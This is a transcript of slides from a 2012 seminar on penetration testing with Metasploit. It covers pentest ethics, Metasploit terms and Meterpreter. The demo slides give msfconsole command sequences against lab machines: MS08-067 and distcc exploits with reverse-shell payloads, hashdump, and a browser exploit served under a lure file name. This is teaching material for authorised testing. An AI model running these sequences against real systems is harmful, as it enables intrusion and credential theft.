pentest with metasploit
DESCRIPTION
Pentest with MetasploitTRANSCRIPT
![Page 1: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/1.jpg)
penetration testing with metasploit
Presented by Syarif
!Seminar IT Security Safe The System
Sumedang, April 29 2012 STMIK Sumedang
![Page 2: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/2.jpg)
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
![Page 3: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/3.jpg)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecture & Engineer
![Page 4: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/4.jpg)
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
![Page 5: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/5.jpg)
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
![Page 6: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/6.jpg)
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
![Page 7: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/7.jpg)
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
![Page 8: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/8.jpg)
<< back|track overview
• Let’s Watch the Video :)
![Page 9: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/9.jpg)
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
![Page 10: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/10.jpg)
<< back|track overview
![Page 11: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/11.jpg)
<< back|track overview
![Page 12: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/12.jpg)
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing security tools and exploits *2)
• Easily build attack vectors to add its exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
![Page 13: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/13.jpg)
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
![Page 14: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/14.jpg)
MSFconsole
![Page 15: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/15.jpg)
MSFcli
![Page 16: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/16.jpg)
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection *1)
![Page 17: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/17.jpg)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run2
3 Upload / Download data
![Page 18: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/18.jpg)
Traditional Pentest Vs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
![Page 19: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/19.jpg)
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
![Page 20: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/20.jpg)
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
![Page 21: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/21.jpg)
Meterpreter command
![Page 22: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/22.jpg)
Meterpreter command
![Page 23: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/23.jpg)
Meterpreter command
![Page 24: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/24.jpg)
Meterpreter command
![Page 25: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/25.jpg)
Meterpreter command
![Page 26: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/26.jpg)
Pentest Scenario
attacker vulnerable OS on VMware
* : Ubuntu 8.04 metasploitable
*
![Page 27: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/27.jpg)
OS in the Lab• BackTrack 5 R 2
• IP address : 172.16.240.143
• Windows Xp SP 2
• IP address : 172.16.240.129
• Windows 2003 Server
• IP address : 172.16.240.141
• Windows 7
• IP address : 172.16.240.142
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.240.144
![Page 28: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/28.jpg)
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
![Page 29: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/29.jpg)
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
![Page 30: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/30.jpg)
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
![Page 31: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/31.jpg)
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
![Page 32: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/32.jpg)
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
![Page 33: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/33.jpg)
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
![Page 35: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/35.jpg)
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
![Page 36: Pentest with Metasploit](https://reader034.vdocuments.mx/reader034/viewer/2022050710/5552eb8ab4c90584028b4691/html5/thumbnails/36.jpg)
References !
!
• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines